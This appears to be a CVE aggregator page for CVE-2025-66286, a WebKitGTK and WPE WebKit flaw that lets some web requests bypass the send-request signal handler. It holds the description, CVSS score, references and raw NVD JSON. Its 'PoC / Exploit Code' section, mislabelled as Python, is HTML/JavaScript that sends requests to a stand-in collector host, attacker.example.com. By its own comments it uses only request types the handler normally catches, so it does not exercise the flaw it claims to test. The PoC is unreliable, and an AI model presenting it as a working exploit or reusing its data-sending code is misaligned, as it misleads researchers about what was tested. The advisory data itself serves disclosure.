CVE-2025-66286

Description

An API design flaw in WebKitGTK and WPE WebKit allows untrusted web content to unexpectedly perform IP connections, DNS lookups, and HTTP requests. Applications expect to use the WebPage::send-request signal handler to approve or reject all network requests. However, certain types of HTTP requests bypass this signal handler.

CVSS Details

CVSS Score

4.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WebKitGTK (特定版本)

WPE WebKit (特定版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!--
Conceptual Proof of Concept for CVE-2025-66286
This script attempts to trigger network requests that may bypass the WebPage::send-request signal.
-->
<html>
<head><title>CVE-2025-66286 PoC</title></head>
<body>
<h2>Testing WebKit Request Bypass</h2>
<p>Inspect network traffic to see if requests bypass the intended signal handler.</p>
<script>
    // Target server to monitor for connections
    var target = "http://attacker.example.com/collect";
    var uniqueId = Math.random().toString(36).substring(7);

    // 1. Standard Fetch Request (Usually caught by signal)
    fetch(target + "?type=fetch&id=" + uniqueId)
        .then(response => console.log('Fetch response received'))
        .catch(error => console.error('Fetch failed', error));

    // 2. Image Load (Usually caught by signal)
    var img = new Image();
    img.src = target + "?type=image&id=" + uniqueId;
    document.body.appendChild(img);

    // Note: In a vulnerable version, specific request types not listed here
    // would bypass the WebPage::send-request handler, leading to unauthorized
    // network traffic visible on the wire but invisible to the application's logic.
    console.log("PoC execution initiated.");
</script>
</body>
</html>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-66286
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-66286
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-66286/
[4] VulDB https://vuldb.com/cve/CVE-2025-66286
[5] https://access.redhat.com/security/cve/CVE-2025-66286
[6] https://bugs.webkit.org/show_bug.cgi?id=259787
[7] https://bugzilla.redhat.com/show_bug.cgi?id=2424652

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-66286", "sourceIdentifier": "[email protected]", "published": "2026-04-23T13:16:11.007", "lastModified": "2026-04-24T14:50:56.203", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "An API design flaw in WebKitGTK and WPE WebKit allows untrusted web content to unexpectedly perform IP connections, DNS lookups, and HTTP requests. Applications expect to use the\nWebPage::send-request signal handler to approve or reject all network requests. However, certain types of HTTP requests bypass this signal handler."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2025-66286", "source": "[email protected]"}, {"url": "https://bugs.webkit.org/show_bug.cgi?id=259787", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2424652", "source": "[email protected]"}]}}